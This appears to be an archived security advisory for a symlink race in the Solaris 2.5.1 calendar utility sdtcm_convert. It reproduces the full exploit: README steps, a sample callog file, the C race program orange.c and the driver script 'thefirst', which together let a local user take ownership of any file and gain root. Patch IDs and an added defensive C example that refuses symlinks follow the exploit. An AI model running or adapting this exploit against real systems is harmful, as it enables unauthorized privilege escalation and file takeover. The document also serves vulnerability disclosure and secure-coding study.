COMMAND
/usr/dt/bin/sdtcm_convert
SYSTEMS AFFECTED
Solaris 2.5.1
PROBLEM
Cristian SCHIPOR <skipo@SUNDY.CS.PUB.RO> found a security hole in
sdtcm_convert on Solaris 2.5.1. sdtcm_convert, the calendar data
conversion utility, allows any user to change the owner of any
file (or directory) on the system or to gain root access.
The exploit is very simple. Change the permission mode of your
calendar file (callog.YOU) in the /var/spool/calendar directory
(usually r--rw----) and run sdtcm_convert. sdtcm_convert notices
the change and offers to correct it (it asks you first). Before
answering, delete the callog file and replace it with a symbolic
link to a target file, then answer 'y' (yes). sdtcm_convert makes
you the owner of the target file...
Cristian made an exploit. This exploit originally consisted of
four files:
exploit_dir/README
exploit_dir/callog.example
exploit_dir/orange.c
exploit_dir/thefirst
Those files now follow.
'README' file
*How to make a simple callog file*
If you don't have a /var/spool/calendar/callog.YOU, edit
callog.example, replace 'skipo' with your user name and
'sundy.cs.pub.ro' with your machine name (try first the short
name, example: sundy, and if you have troubles try the
long name, example: sundy.cs.pub.ro). After that copy the new
callog file to /var/spool/calendar/callog.YOUR_USER_NAME, run
sdtcm_convert once with your user name (example: sdtcm_convert
skipo) and wait for corrections. Now you are ready to run the
exploit.
'callog.example' file
Version: 4
**** start of log on Fri Dec 6 14:07:43 1996 ****
(calendarattributes ("-//XAPIA/CSA/CALATTR//NONSGML Access List//EN","10:access_list","world:2")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN","5:string","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN","6:user","skipo@sundy.cs.pub.ro")
("-//XAPIA/CSA/CALATTR//NONSGML Character Set//EN","5:string","C.ISO-8859-1")
("-//XAPIA/CSA/CALATTR//NONSGML Date Created//EN","7:date_time","19961206T120743Z")
("-//XAPIA/CSA/CALATTR//NONSGML Product Identifier//EN","5:string","-//DT//NONSGML Calendar Product Version 1//EN")
("-//XAPIA/CSA/CALATTR//NONSGML Version//EN","5:string","-//XAPIA/CSA/VERSION1/NONSGML CSA Version 1//EN")
)
'orange.c' file
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

#define path "/var/spool/calendar/callog."

int main(int argc, char *argv[])
{
    int pid, filedes[2];
    struct stat info;
    long i;
    char target[128], shift[128];

    if (argc < 3) {
        fprintf(stderr, "usage: %s target user\n", argv[0]);
        exit(1);
    }
    /* target: file whose owner should change; shift: the user's callog file */
    snprintf(target, sizeof target, "%s", argv[1]);
    snprintf(shift, sizeof shift, "%s%s", path, argv[2]);
    if (pipe(filedes)) {
        perror("cannot create pipe");
        exit(1);
    }
    if ((pid = fork()) == 0) {
        /* child: wait until sdtcm_convert has asked its question, then
           swap the callog file for a symlink to the target and answer 'y' */
        for (i = 0; i < 30000000; i++)
            ;
        unlink(shift);
        symlink(target, shift);
        write(filedes[1], "y\n", 2);
    } else {
        /* parent: run the 'lemon' script (written by 'thefirst') with its
           stdin connected to the pipe, so the child's answer reaches
           sdtcm_convert, then check whether the target changed owner */
        close(0);
        dup(filedes[0]);
        system("lemon");
        stat(target, &info);
        if (info.st_uid == getuid())
            printf("COLL I did IT !!!\n");
    }
    return 0;
}
'thefirst' file
#!/bin/sh
/bin/echo "orange.c -> orange"
gcc -o orange orange.c
/usr/ucb/whoami > wh
read USER < ./wh
# stop if the callog file does not exist
if ! test -f /var/spool/calendar/callog.$USER; then
    /bin/echo "I can't find the callog file. Please read README and create it"
    exit
fi
/bin/echo "what's the target ???"
read TARGET
# 'lemon' is run by orange with its stdin connected to orange's pipe
/bin/echo /bin/chmod 000 /var/spool/calendar/callog.$USER > lemon
/bin/echo /usr/dt/bin/sdtcm_convert $USER >> lemon
/bin/chmod 700 ./lemon
./orange $TARGET $USER
SOLUTION
A simple way to correct this is to remove the set-user-ID bit from
sdtcm_convert. There is also a set of Sun patches that corrects this
vulnerability:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
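The bug class above is a privileged program repairing a spool file by path name, so that a symlink planted between the check and the chown redirects the change to any file. The following is an added example, not code from the advisory or from CDE: it opens the spool file with O_NOFOLLOW, verifies through fstat() that it is a regular file already owned by the calling user, and only then changes the mode through the descriptor, so a symlink decoy is refused. The function names, the sandbox under /tmp and the 0640 mode are assumptions.

```c
/* Added example, not from the advisory: fix a spool file's mode without
 * following a planted symlink. chmod()/chown() on a path act on whatever the
 * name points to at that instant; here the check and the change use one fd. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 0 if `path` is a regular file owned by `owner` and was re-moded,
 * -1 otherwise (a symlink makes open() fail with ELOOP because of O_NOFOLLOW). */
int safe_fix_mode(const char *path, uid_t owner, mode_t want)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    int rc = -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == owner)
        rc = fchmod(fd, want);   /* the fd is bound to the inode just checked */
    close(fd);
    return rc;
}

/* Self-check in a constructed sandbox (hypothetical names): a real callog, a
 * symlink decoy pointing at a target file (the exploit's trick) and the target
 * at mode 0600. Returns 1 when the real file is fixed, the decoy refused and
 * the target untouched. */
int selfcheck(void)
{
    char dir[] = "/tmp/callogXXXXXX";
    char real[256], decoy[256], target[256];
    struct stat st;
    int fd;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(real, sizeof real, "%s/callog.user", dir);
    snprintf(decoy, sizeof decoy, "%s/callog.decoy", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if ((fd = open(real, O_CREAT | O_WRONLY, 0600)) >= 0) close(fd);
    if ((fd = open(target, O_CREAT | O_WRONLY, 0600)) >= 0) close(fd);
    if (symlink(target, decoy) != 0) return 0;
    int real_ok = safe_fix_mode(real, getuid(), 0640) == 0;
    int decoy_refused = safe_fix_mode(decoy, getuid(), 0640) != 0;
    int target_untouched = stat(target, &st) == 0 && (st.st_mode & 0777) == 0600;
    unlink(real); unlink(decoy); unlink(target); rmdir(dir);
    return real_ok && decoy_refused && target_untouched;
}
```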